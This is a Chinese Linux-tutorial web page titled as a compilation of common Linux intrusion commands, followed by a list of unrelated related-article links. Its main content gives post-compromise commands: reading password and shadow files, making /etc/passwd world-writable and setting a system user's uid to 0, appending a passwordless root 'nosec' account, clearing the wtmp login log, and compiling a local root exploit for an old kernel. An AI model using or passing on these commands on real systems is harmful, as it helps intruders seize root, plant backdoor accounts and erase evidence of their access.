服务器之家:专注于服务器技术及软件下载分享
分类导航

Linux|Centos|Ubuntu|系统进程|Fedora|注册表|Bios|Solaris|Windows7|Windows10|Windows11|

服务器之家 - 服务器系统 - Linux - linux 入侵常用命令汇编

linux 入侵常用命令汇编

2021-08-26 17:03Linux教程网 Linux

掌握这些命令也有助于配置linux的安全,大家可以看看。

cat /etc/passwd 查看linux用户

cat /etc/shadow 查看用户密码需要root权限

cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息

ifconfig 查看本机ip信息

cat /etc/resolv.conf 查看DNS信息

bash -i 在反弹的shell中使用可以直观显示命令

bash prompt: 当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt。当你以Root登陆时,你的prompt会变成

bash#。

系统变量 : 试着echo "$USER / $EUID" 系统应该会告诉你它认为你是什么用户。

echo 1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1>/proc/sys/net/ipv4/ip_forward,

vim /proc/sys/net/ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理!

netstat -an |grep LISTEN |grep :80 查看端口

service --status-all | grep running

service --status-all | grep http

查看运行服务

lsb_release -a 查看系统版本

重启ssh服务 :/usr/sbin/sshd stop

/usr/sbin/sshd start

ssd_config文件里

PasswordAuthentication no,

将其改为

PasswordAuthentication yes

远程ssh才可登录

否则显示Access denied

其中Usepam yes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开.

su的菜鸟用法

先chomod 777 /etc/passwd

然后修改bin用户的gid和uid为0

然后passwd设置bin的密码

然后cp /bin/bash /sbin/nologin

然后su的时候su - bin就可以到rootshell了。

这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码,的一种很菜鸟的做法

还可以这样

sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd

gcc prtcl2.c –o local –static –Wall

echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd

echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

清空last记录 cp /dev/null /var/log/wtmp

-----

dd if=/dev/zero of=yourfile bs=10M count=10 建立一个100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提权的时候要用到的。

延伸 · 阅读

精彩推荐
  • LinuxDeepin很卡怎么办?Deepin卡顿解决方法盘点

    Deepin很卡怎么办?Deepin卡顿解决方法盘点

    相信有了解的朋友都清楚,很多情况都有可能导致 Deepin 卡顿、掉帧,其中便包括了显卡驱动不稳定、窗口管理器占用较高等等。那么,Deepin很卡该怎么办...

    系统之家15982020-05-17
  • Linux如何在Linux系统中使用QQ

    如何在Linux系统中使用QQ

    目前,使用windows系统的用户占多数,很多人还是比较习惯使用windows系统,我们都知道,使用windows系统可以轻松的使用聊天工具进行聊天,那么在Linux系统...

    系统之家9322021-02-27
  • Linux2020最受欢迎的Linux发行版Top 10

    2020最受欢迎的Linux发行版Top 10

    在2020年的今天Linux已经深入人心获得了越来越多的接纳,然而Linux发行版众多,大家普遍存在选择障碍。本文我们就给大家介绍一下2020年最受欢迎的Top 10发...

    虫虫搜奇12312020-11-05
  • LinuxLinux系统开机启动过程分解

    Linux系统开机启动过程分解

    这篇文章主要介绍了Linux系统开机启动过程分解,本文把Linux系统的开机过程分为5步来讲解,需要的朋友可以参考下 ...

    Linux教程网4272019-11-01
  • Linux如何使用 Linux anacron 命令

    如何使用 Linux anacron 命令

    我最喜欢 Linux 的一个原因是它愿意为我做工作。我不想执行重复性的任务,这些任务会占用我的时间,或者容易出错,或者我可能会忘记,我安排 Linux 为...

    Linux中国10492021-04-06
  • Linuxlinux比较两个文件是否一样(linux命令md5sum使用方法)

    linux比较两个文件是否一样(linux命令md5sum使用方法)

    在linux或Unix上,md5sum是用来计算和校验文件报文摘要的工具程序,下面我们看几个使用实例 ...

    Linux教程网6462019-11-23
  • Linuxlinux tune2fs命令详细介绍

    linux tune2fs命令详细介绍

    tune2fs是调整和查看ext2/ext3文件系统的文件系统参数,Windows下面如果出现意外断电死机情况,下次开机一般都会出现系统自检,需要了解的朋友可以参考下...

    linux命令大全6412019-12-15
  • Linux安装 unixbench make: *** [pgms/ubgears] Error 1 的解决方法

    安装 unixbench make: *** [pgms/ubgears] Error 1 的解决方法

    Unixbeanch是一个运行在Unix和Linux上的硬件性能测试工具,经常被用来测试VPS性能.本文将列出Unixbeanch在Debian上的安装步骤,希望能帮助到有需要的朋友 ...

    Linux教程网6002019-11-27